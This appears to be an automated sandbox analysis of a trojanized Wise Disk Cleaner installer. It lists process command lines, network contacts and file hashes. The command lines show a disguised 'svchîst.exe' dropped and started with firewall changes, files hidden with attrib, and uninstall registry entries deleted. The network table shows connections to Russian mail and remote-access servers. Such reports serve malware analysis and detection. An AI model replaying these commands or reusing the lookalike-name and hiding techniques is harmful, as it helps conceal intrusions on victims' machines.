REG ADD "HKLM\SOFTWARE\Classes\.gz" /v General /t REG_BINARY /d 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 /f
C:\Windows\SysWOW64\reg.exe
reg delete "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\installer 20.0.37920.2020" /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Classes\.gz" /v Security /t REG_BINARY /d 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 /f
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
C:\Windows\SysWOW64\drivers\svchîst.exe
"C:\Windows\System32\drivers\svchîst.exe" /silentinstall
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c "C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c "C:\Program Files\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c attrib -h -s -r "C:\Users\Admin\AppData\Local\Temp\Wise Disk Cleaner\10.3.6.788\*.*"
C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe
"C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe"
C:\Windows\SysWOW64\attrib.exe
attrib -h -s -r "C:\Users\Admin\AppData\Local\Temp\Wise Disk Cleaner\10.3.6.788\*.*"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c RMDIR /s/q "C:\Users\Admin\AppData\Local\Temp\Wise Disk Cleaner"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg delete "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Wise Disk Cleaner 10.3.6.788" /f
C:\Windows\SysWOW64\drivers\svchîst.exe
"C:\Windows\System32\drivers\svchîst.exe" /firewall
C:\Windows\SysWOW64\reg.exe
reg delete "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Wise Disk Cleaner 10.3.6.788" /f
C:\Windows\SysWOW64\drivers\svchîst.exe
"C:\Windows\System32\drivers\svchîst.exe" /start
C:\Windows\SysWOW64\drivers\svchîst.exe
"C:\Windows\SysWOW64\drivers\svchîst.exe"
C:\Windows\SysWOW64\attrib.exe
attrib +h +s "C:\Windows\System32\idfgvgjnghcdfb.reg"
C:\Windows\SysWOW64\attrib.exe
attrib +h +s "svchîst.exe"
C:\Windows\SysWOW64\attrib.exe
attrib -h -s "install.exe"
C:\Windows\SysWOW64\attrib.exe
attrib -h -s "install.cmd"
C:\Windows\SysWOW64\drivers\svchîst.exe
C:\Windows\SysWOW64\drivers\svchîst.exe -firewall
Network
| Country | Destination | Domain | Proto |
| NL | 20.50.201.200:443 | | tcp |
| NL | 67.26.111.254:80 | | tcp |
| NL | 67.26.111.254:80 | | tcp |
| NL | 67.26.111.254:80 | | tcp |
| US | 13.107.21.200:443 | | tcp |
| US | 8.8.8.8:53 | www.wisecleaner.net | udp |
| US | 23.224.25.141:80 | www.wisecleaner.net | tcp |
| US | 8.8.8.8:53 | www.wisecleaner.net | udp |
| US | 8.8.8.8:53 | info.wisecleaner.com | udp |
| US | 104.26.2.143:80 | info.wisecleaner.com | tcp |
| US | 104.26.2.143:80 | info.wisecleaner.com | tcp |
| US | 23.224.25.141:80 | www.wisecleaner.net | tcp |
| US | 8.8.8.8:53 | smtp.spaceweb.ru | udp |
| RU | 77.222.41.136:25 | smtp.spaceweb.ru | tcp |
| US | 8.8.8.8:53 | rms-server.tektonit.ru | udp |
| RU | 95.213.205.83:5655 | rms-server.tektonit.ru | tcp |
| RU | 109.234.156.179:5655 | | tcp |
Files
memory/1800-130-0x0000000000000000-mapping.dmp
memory/528-131-0x0000000000000000-mapping.dmp
memory/5008-132-0x0000000000000000-mapping.dmp
memory/544-133-0x0000000000000000-mapping.dmp
memory/1196-134-0x0000000000000000-mapping.dmp
memory/876-135-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\Wise Disk Cleaner\10.3.6.788\setup.exe
| MD5 | a22b08040d741fb41fc5812996ad3e8f |
| SHA1 | cc684e1c8d24aabeb0eab2763655d3050389c953 |
| SHA256 | d42f5676db9952c13cc8955238341956b59ca1dfe6b1afb1c8ca813bb62ddb9c |
| SHA512 | a8d6b75d66a5b79d8b34c2a32acd4b077805e36d187fbd73ba2f4e8e32b92fe42016540314cae516a9687b5a30b74e9f126750ae99035daa2f36eed784a9fe4e |
C:\Users\Admin\AppData\Local\Temp\Wise Disk Cleaner\10.3.6.788\setup.exe
| MD5 | a22b08040d741fb41fc5812996ad3e8f |
| SHA1 | cc684e1c8d24aabeb0eab2763655d3050389c953 |
| SHA256 | d42f5676db9952c13cc8955238341956b59ca1dfe6b1afb1c8ca813bb62ddb9c |
| SHA512 | a8d6b75d66a5b79d8b34c2a32acd4b077805e36d187fbd73ba2f4e8e32b92fe42016540314cae516a9687b5a30b74e9f126750ae99035daa2f36eed784a9fe4e |
memory/4876-138-0x0000000000000000-mapping.dmp
memory/876-139-0x0000000000400000-0x0000000000438000-memory.dmp
memory/4576-140-0x0000000000000000-mapping.dmp
memory/4592-142-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp
| MD5 | 2542d7026b9bbf47242cc3bae8e889e7 |
| SHA1 | 4c3fc03a3f49f8caa348d4e1b3942a103eeabd0d |
| SHA256 | 71a433a0904ade7f442a79d8d69df5400e939b5bc1ba043735e6c5825a024ddf |
| SHA512 | be76671d82fe68f79a90704ebf6c3e199b179cdacfac92e5d8c509215e2c3f9e9a4f70e0fd84373b393ebc80a2a03d5eacd151107d6b2e4e90ce62478506acbb |
memory/4632-143-0x0000000000000000-mapping.dmp
memory/876-145-0x0000000000400000-0x0000000000438000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp
| MD5 | 2542d7026b9bbf47242cc3bae8e889e7 |
| SHA1 | 4c3fc03a3f49f8caa348d4e1b3942a103eeabd0d |
| SHA256 | 71a433a0904ade7f442a79d8d69df5400e939b5bc1ba043735e6c5825a024ddf |
| SHA512 | be76671d82fe68f79a90704ebf6c3e199b179cdacfac92e5d8c509215e2c3f9e9a4f70e0fd84373b393ebc80a2a03d5eacd151107d6b2e4e90ce62478506acbb |
memory/4252-147-0x0000000000000000-mapping.dmp
memory/1372-148-0x0000000000000000-mapping.dmp
C:\Windows\SysWOW64\drivers\install.exe
| MD5 | 1cd9ee0406b9a04672fdd385ca7631ce |
| SHA1 | 5b3b49cd7906676ad46a7b7d192967df6c9ea505 |
| SHA256 | 2867d9d82ad10a29d36b2bee57993db95246b8fc90824d03d04f6e91b2eb34e8 |
| SHA512 | 367fd8fb8e0d8215febed8c8fd223b35758acd82bcb678109068bb34d588d331ade1309e4c7d76a57014dab55e0e629127cc4229f2f8ea1ddc49b228ac6a61a7 |
C:\Windows\SysWOW64\drivers\install.exe
| MD5 | 1cd9ee0406b9a04672fdd385ca7631ce |
| SHA1 | 5b3b49cd7906676ad46a7b7d192967df6c9ea505 |
| SHA256 | 2867d9d82ad10a29d36b2bee57993db95246b8fc90824d03d04f6e91b2eb34e8 |
| SHA512 | 367fd8fb8e0d8215febed8c8fd223b35758acd82bcb678109068bb34d588d331ade1309e4c7d76a57014dab55e0e629127cc4229f2f8ea1ddc49b228ac6a61a7 |
C:\Users\Admin\AppData\Local\Temp\$inst\2.tmp
| MD5 | 8708699d2c73bed30a0a08d80f96d6d7 |
| SHA1 | 684cb9d317146553e8c5269c8afb1539565f4f78 |
| SHA256 | a32e0a83001d2c5d41649063217923dac167809cab50ec5784078e41c9ec0f0f |
| SHA512 | 38ece3e441cc5d8e97781801d5b19bdede6065a0a50f7f87337039edeeb4a22ad0348e9f5b5542b26236037dd35d0563f62d7f4c4f991c51020552cfae03b264 |
memory/1492-152-0x0000000000000000-mapping.dmp
memory/1712-153-0x0000000000000000-mapping.dmp
memory/2988-154-0x0000000000000000-mapping.dmp
memory/116-155-0x0000000000000000-mapping.dmp
memory/4516-156-0x0000000000000000-mapping.dmp
memory/2508-157-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\is-RO3QC.tmp\CSTask.exe
| MD5 | e6495a498dfa91672a383cb9459c9c5e |
| SHA1 | d1d44a9ec6df8fc42008c13bcf18ca5f790a371e |
| SHA256 | ac5d91aafd9a3f099bb857130bd9d5706172ea8a0f50878e5c86916745df2778 |
| SHA512 | 7bbdf2006847a3ccbbca9dc02ec8dd32b3f7094470febf2aff213b8ada291835548ec14441d341beaddf5320ae8c25a5c66dd99b8015769615854d5236ecb27a |
C:\Users\Admin\AppData\Local\Temp\is-RO3QC.tmp\CSTask.exe
| MD5 | e6495a498dfa91672a383cb9459c9c5e |
| SHA1 | d1d44a9ec6df8fc42008c13bcf18ca5f790a371e |
| SHA256 | ac5d91aafd9a3f099bb857130bd9d5706172ea8a0f50878e5c86916745df2778 |
| SHA512 | 7bbdf2006847a3ccbbca9dc02ec8dd32b3f7094470febf2aff213b8ada291835548ec14441d341beaddf5320ae8c25a5c66dd99b8015769615854d5236ecb27a |
memory/4636-160-0x0000000000000000-mapping.dmp
memory/4740-161-0x0000000000000000-mapping.dmp
memory/2040-162-0x0000000000000000-mapping.dmp
memory/4464-163-0x0000000000000000-mapping.dmp
memory/1120-164-0x0000000000000000-mapping.dmp
C:\Windows\SysWOW64\drivers\svchîst.exe
| MD5 | a6fcc7dd9a6e029c921555b1de6fd586 |
| SHA1 | a889c079a86d600896e14973ba5775b6b1f6ac60 |
| SHA256 | 4070e977823d74478aec248862302063918fda16b57f2c3b561018605bfbf4fe |
| SHA512 | 6c0e94c53c90a6963587bd9ca88aff20bdcc3aad4e7ad25ef2192e278fd9cfc727b7b1a544149ec5d4d91697e90d507bebf6691b8851a976802ad9282af1fddb |
memory/2172-166-0x0000000000000000-mapping.dmp
memory/2752-167-0x0000000000000000-mapping.dmp
memory/2408-168-0x0000000000000000-mapping.dmp
C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe
| MD5 | e2921d7229412e500624c09645a5d222 |
| SHA1 | b1ce462f1a21b726f515150c5aede4b8c592c906 |
| SHA256 | ddbe20fca82bad3524f1940fbb5719560a19e61848f802232c4a3f282244b96c |
| SHA512 | 09bbf7bd9ae1ca3ae9389ac2a031bb14ef97aa9ae151ad4f3c689bc78fcc6cf511c52bddb870271365745c47c5199191d6803cade998af2c67269c54bea978a8 |
C:\Program Files (x86)\Wise\Wise Disk Cleaner\WJSLib.dll
| MD5 | b936056bd95fa2de3197f0267c07f529 |
| SHA1 | 2cb2a37e5df9a9039995e0248058f0df361d7a90 |
| SHA256 | 1ec6c0f9ac71693fc04e59855f4231d4348761b4a2eb1171916dee56b604ce89 |
| SHA512 | 156ead7c66ae263457e4605f7970506f43af79e1ad15fbd0d76f6435f0bd9ec20591bb779132315a4ad422fb3484982ace37e8a4c73d1987a7a5030a4e3745a3 |
C:\Program Files (x86)\Wise\Wise Disk Cleaner\WJSLib.dll
| MD5 | b936056bd95fa2de3197f0267c07f529 |
| SHA1 | 2cb2a37e5df9a9039995e0248058f0df361d7a90 |
| SHA256 | 1ec6c0f9ac71693fc04e59855f4231d4348761b4a2eb1171916dee56b604ce89 |
| SHA512 | 156ead7c66ae263457e4605f7970506f43af79e1ad15fbd0d76f6435f0bd9ec20591bb779132315a4ad422fb3484982ace37e8a4c73d1987a7a5030a4e3745a3 |
memory/2512-170-0x0000000000000000-mapping.dmp
C:\Program Files (x86)\Wise\Wise Disk Cleaner\sqlite3.dll
| MD5 | dfa08af47fb6bbff6b92308bdce07fe8 |
| SHA1 | 63078cb67be4bf2dda6cf0de7cfa204ba91441ca |
| SHA256 | 7c02eb0f0d7ffe0738649a3aff2c70d3196c9afba81efd56a3b85ca65ee8ffce |
| SHA512 | 07848b8cf0eeae17fc67cfb58b2ea009c1726d11256a1c23433dc05a73e703329bfb5d6cc686c8f1f3e2cefc14bc6a946a336d042f982ace23bd398ec1320967 |
C:\Program Files (x86)\Wise\Wise Disk Cleaner\sqlite3.dll
| MD5 | dfa08af47fb6bbff6b92308bdce07fe8 |
| SHA1 | 63078cb67be4bf2dda6cf0de7cfa204ba91441ca |
| SHA256 | 7c02eb0f0d7ffe0738649a3aff2c70d3196c9afba81efd56a3b85ca65ee8ffce |
| SHA512 | 07848b8cf0eeae17fc67cfb58b2ea009c1726d11256a1c23433dc05a73e703329bfb5d6cc686c8f1f3e2cefc14bc6a946a336d042f982ace23bd398ec1320967 |
C:\Windows\SysWOW64\drivers\libeay32.dll
| MD5 | 4cb2e1b9294ddae1bf7dcaaf42b365d1 |
| SHA1 | a225f53a8403d9b73d77bcbb075194520cce5a14 |
| SHA256 | a8124500cae0aba3411428c2c6df2762ea11cc11c312abed415d3f3667eb6884 |
| SHA512 | 46cf4abf9121c865c725ca159df71066e0662595915d653914e4ec047f94e2ab3823f85c9e0e0c1311304c460c90224bd3141da62091c733dcaa5dccf64c04bb |
C:\Windows\SysWOW64\drivers\ssleay32.dll
| MD5 | 5c268ca919854fc22d85f916d102ee7f |
| SHA1 | 0957cf86e0334673eb45945985b5c033b412be0e |
| SHA256 | 1f4b3efc919af1106f348662ee9ad95ab019058ff502e3d68e1b5f7abff91b56 |
| SHA512 | 76d0abad1d7d0856ec1b8e598b05a2a6eece220ea39d74e7f6278a4219e22c75b7f618160ce41810daa57d5d4d534afd78f5cc1bd6de927dbb6a551aca2f8310 |
C:\Windows\SysWOW64\drivers\ssleay32.dll
| MD5 | 5c268ca919854fc22d85f916d102ee7f |
| SHA1 | 0957cf86e0334673eb45945985b5c033b412be0e |
| SHA256 | 1f4b3efc919af1106f348662ee9ad95ab019058ff502e3d68e1b5f7abff91b56 |
| SHA512 | 76d0abad1d7d0856ec1b8e598b05a2a6eece220ea39d74e7f6278a4219e22c75b7f618160ce41810daa57d5d4d534afd78f5cc1bd6de927dbb6a551aca2f8310 |
C:\Windows\SysWOW64\drivers\libeay32.dll
| MD5 | 4cb2e1b9294ddae1bf7dcaaf42b365d1 |
| SHA1 | a225f53a8403d9b73d77bcbb075194520cce5a14 |
| SHA256 | a8124500cae0aba3411428c2c6df2762ea11cc11c312abed415d3f3667eb6884 |
| SHA512 | 46cf4abf9121c865c725ca159df71066e0662595915d653914e4ec047f94e2ab3823f85c9e0e0c1311304c460c90224bd3141da62091c733dcaa5dccf64c04bb |
memory/3564-179-0x0000000000000000-mapping.dmp
memory/3504-180-0x0000000000000000-mapping.dmp
memory/4416-181-0x0000000000000000-mapping.dmp
memory/3052-182-0x0000000000000000-mapping.dmp
C:\Windows\SysWOW64\drivers\svchîst.exe
| MD5 | a6fcc7dd9a6e029c921555b1de6fd586 |
| SHA1 | a889c079a86d600896e14973ba5775b6b1f6ac60 |
| SHA256 | 4070e977823d74478aec248862302063918fda16b57f2c3b561018605bfbf4fe |
| SHA512 | 6c0e94c53c90a6963587bd9ca88aff20bdcc3aad4e7ad25ef2192e278fd9cfc727b7b1a544149ec5d4d91697e90d507bebf6691b8851a976802ad9282af1fddb |
C:\Windows\SysWOW64\drivers\ssleay32.dll
| MD5 | 5c268ca919854fc22d85f916d102ee7f |
| SHA1 | 0957cf86e0334673eb45945985b5c033b412be0e |
| SHA256 | 1f4b3efc919af1106f348662ee9ad95ab019058ff502e3d68e1b5f7abff91b56 |
| SHA512 | 76d0abad1d7d0856ec1b8e598b05a2a6eece220ea39d74e7f6278a4219e22c75b7f618160ce41810daa57d5d4d534afd78f5cc1bd6de927dbb6a551aca2f8310 |
C:\Windows\SysWOW64\drivers\libeay32.dll
| MD5 | 4cb2e1b9294ddae1bf7dcaaf42b365d1 |
| SHA1 | a225f53a8403d9b73d77bcbb075194520cce5a14 |
| SHA256 | a8124500cae0aba3411428c2c6df2762ea11cc11c312abed415d3f3667eb6884 |
| SHA512 | 46cf4abf9121c865c725ca159df71066e0662595915d653914e4ec047f94e2ab3823f85c9e0e0c1311304c460c90224bd3141da62091c733dcaa5dccf64c04bb |
memory/3720-186-0x0000000000000000-mapping.dmp
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\French.ini
| MD5 | 3ec80eda36af3cae27ad0bc179efe392 |
| SHA1 | 42924e65a3b9bef333b9f546343cf30d6fe25d71 |
| SHA256 | 0c05485c08fc6877eae77afa6d38623360c16aadf9b6ad0271079854b6d8b83e |
| SHA512 | 6f5a1c499adb8d8fd20b29293a8b91e942de6945df1df0185d7e2e71ed48ea917f38b785f206f0d6065b6ae4a5b85f38e8275315e86679d4def32f35d1351cb4 |
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\German.ini
| MD5 | 12aa09156da6482c24a1b2d4b55d855c |
| SHA1 | 1c2dad1b7d7beeb65710da2efafe36688754000e |
| SHA256 | 2fd313688b2ad99a3a4be590b5b96f4932cdecf5211771b84f2d060b00a3893e |
| SHA512 | 0742e6ab784dc765dcd13f0551883bad341b254cb993a8a6016ffbd18846109bbb6f00611dfde797db8382e014805c6e2a8ac38c50c827054af9ac7447e511dd |
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Welsh.ini
| MD5 | f1aa230d4e1dc0ad8ce48dbbf0f93353 |
| SHA1 | 45c5ef63cf2110a2a11461185d30b9c5a081fc22 |
| SHA256 | 265348499e6625affb99259e7d1770f0155a5e3b7bf62f4b61f3aa01832d8f9c |
| SHA512 | 263251223abca66cdeec425651c706d49e7bcc48769344104ef9cd5122ff9bdc125153b25207fc0af744b20d61086894cc8b10ee3defba9493e5da2709717202 |
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Ukrainian.ini
| MD5 | a3384eb4a6122fb763038c26359acf05 |
| SHA1 | a0d587ccf4f19022e6e4b4df3106e87a1ded94c7 |
| SHA256 | 3d20e0e5cfd6375253d4286ec5fd33fdf7aeb0d8bf26cb714d8b91e3b3c10868 |
| SHA512 | 6b2d99fb897f6e7fa017b312127f29d37bfd046b343c1a6849a4e7cb408e9f7709d3b5d2000fab430f6189e70cd6afffef324b1187f8b25fe2e9ce3ca2b04a27 |
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Turkish.ini
| MD5 | f34b68131e35f62513feb8278cca1ae1 |
| SHA1 | bd4ac075b01cd358431e2d9ad6fb2fe2de8b5aff |
| SHA256 | 49b0ecac0b88c345cd6b5f3f501f25e3720077faf6710c5f2b6fd984e4d4d7f9 |
| SHA512 | c6cdbeb4771f3cc2de6116c0fde80348d34ade78506d54c61eca596d3131bd809452155fc4868b18f15b3968ee0ae4f01e7cbefecafd58d499e263543bdc1dbf |
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Thai.ini
| MD5 | 85f062f1a900a1da8a32f46803cb62fb |
| SHA1 | 5baa775d7d287060937f8b86c69be1850a1f9ab4 |
| SHA256 | 3e8e09cf740bef1dabdcb6a7c69185bf0fac3f13b727c2c1de79fbde7308470a |
| SHA512 | 7b40bff744244e48edafdb999aed616519b7665187a25d522c88532a0e5e8eacc9091fbb198c93fbe39a860e10c35ee39a689e8f31dab2cca578cf12057fef50 |
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Swedish.ini
| MD5 | 8f053575db50cfaf4418fb2e5263b2ae |
| SHA1 | cb95844f69291b2656726f156e51b8611a55d4fb |
| SHA256 | 98677a07f37daa333e507fc576aba8ebb4489a5822104f7c4bee53db2f8e4202 |
| SHA512 | e7e3fcddd6f1b21aa48901f0e8d9633705b69d8f34ce08c2e7fd81128c7dd811bf2755e4f517325a10480a427a7eebe19307deb96edff9ecc8077094ea740061 |
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Spanish (Spain).ini
| MD5 | fef1352852ad6da36123893c3c183834 |
| SHA1 | 5599ea541a373e9e63b692db17126eb42f1739bf |
| SHA256 | d295342e3fff2bb44fe3010669400ddbc82e103f87beb5ead1c6b3cab3ade0b6 |
| SHA512 | 7dda1508cd623dc753ef137ac58e759bab22f422f20d3802c49876bdd003015468ef5674c4186ae04fb745ae56d9ae21d57438baffad9597f0be53ee2e9f8d3a |
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Spanish (Colombia).ini
| MD5 | ae51cebbeb929ca8ef00abdee0554352 |
| SHA1 | e245b0ece229b9d1a2109fb48e1533f0f7dcc490 |
| SHA256 | 9cb9b5580e4706168c02b07f3ef6656ebd2f6d9661cccd75b089a465d5ac0565 |
| SHA512 | c617871237592bfe3bcd1ac4e3b41ef4157b0b6cbcb636fe0d56f8ea59c198fc4551b6b86f1497778f3c4db06fb8e89169e5ac0e9662532d4c6f0f0b944a3ea1 |
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Slovenian.ini
| MD5 | 204fe6fcde25232628a4d7b34e6b87fd |
| SHA1 | 613efc64843467bd90ec64949367f2139f4b581e |
| SHA256 | 4940b086c467d2ee6fd232f787bf03382c8328f2ce71c7ca747c02a7a368c1de |
| SHA512 | 88af2f2bff0fb8daa60c048cef6008bafdb636970b30da4765cf6ee2f62604e1581a3ce822555a14d018a7f10d0d2da2e072d58b12be4f27200dcdf20890b726 |
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Slovak.ini
| MD5 | 5108c5d28c126216a792f4a0900847fa |
| SHA1 | 9a8b3e565e37e1bf717d3e1c7ebca12e414328f5 |
| SHA256 | 3860ad448ebd501be377fbd46c65cb4e7aecc809900d5f085ee5223931425695 |
| SHA512 | ce241b74f7903131fd0af070cc75a29d01e375e5d05636814fa123c1edfdb0304863f997fb3fcb3467bf87b770f8412acf67a29480b96877e8d4fd0888b39438 |
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Serbian.ini
| MD5 | d5de1a134aab351dcd5b8f22f32ec30a |
| SHA1 | 45404143905dcb284e99acd78285a3ba86a1c1a6 |
| SHA256 | 2a2338c828fd426a6d50e4866ed1c59ccd292b877cf66374c57a8826b30c9aa1 |
| SHA512 | 7727f4c9902daae600e48a950afd61ba2e26d8a943f20bbfc2ec7eaf01f1de2a8b9d04e4fd4ec9b38cf700c6df00d58c714f1208e60383755ad5220715912427 |
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Russian.ini
| MD5 | 479bfcd4c6e0a91bce8eeb3d5282902a |
| SHA1 | a73b34daca2a27e159a7f14148423bd0e8877287 |
| SHA256 | b326491b5a4245e9b3a436cfe1b023d88b35cdbbb50368bbac5f7d1f19560718 |
| SHA512 | 8c799a763cae7bdd33ff8d9a3295b2b92f87413bdb46e590c02255aedbd32707faf5d5badfc884cddeeb8be4772c2f824d16af3996e5ecb0692a2399594121f0 |
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Romanian.ini
| MD5 | e56f223aea3e1d394c31b93f17054cb7 |
| SHA1 | 9fe9ca1dc70cd7e0b2264842139a364ac4a8e689 |
| SHA256 | 865b6284291dba5b148d236f0ebfd3aebf0998dabfe36cc3a013658af1733dcc |
| SHA512 | 21050172c652bbcc93ab409d16aaef330a713d8dcf33b5f84ea323832b3489bddcb98ec552d00e48afd894e1f935a0fdc22749ee018f8d46d407559a0137eeed |
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Portuguese(Portugal).ini
| MD5 | 66ccf14a92b6354bed01867615a76d90 |
| SHA1 | 7f133285713146b2e343d44c0de190fac75e40f6 |
| SHA256 | a3af006e4957a14abd637e50cf265ecba049ca53ff716ec0298c96a0265a2f9e |
| SHA512 | c43f521781d59a150a124d6105d295dbfb5ac6dee0401b9c927eeda8ba0a8df21d1e69fdf8dc090314f3945b97dc72a9cd3ba9aed34bbb8f9ae96fdcb96ca784 |
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Portuguese(Brasil).ini
| MD5 | 3445d1277329541b11ddb2b1b5dc54f5 |
| SHA1 | 57fac60be3e79eb01d4170df6abbb44dc62c21e6 |
| SHA256 | c34cf5c5773429d9c1273bdeebaf59fc0f7984db541f6524d2c1718c191aeed2 |
| SHA512 | 2b0080337609bd458677532371a9226b9112edc9a1c8a6567423fd324559338c934ae409a012a903ca6f464281c327a812aefe932395d9e739ef8f0e379ebf28 |
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Polish.ini
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Persian.ini
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Norwegian (Nynorsk).ini
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Norwegian (Bokmal).ini
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Nepali.ini
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Korean.ini
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Japanese.ini
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Italian.ini
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Indonesian.ini
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Hungarian.ini
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Hebrew.ini
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Greek.ini
C:\Windows\SysWOW64\drivers\svchîst.exe
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Finnish.ini
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\English.ini
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Dutch (Nederlands).ini
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Danish.ini
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Czech.ini
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Chinese(Traditional).ini
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Chinese(Simplified).ini
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Catalan(Spain).ini
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Bulgarian.ini
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Belarusian(Latin).ini
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Belarusian(Cyrillic).ini
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Arabic.ini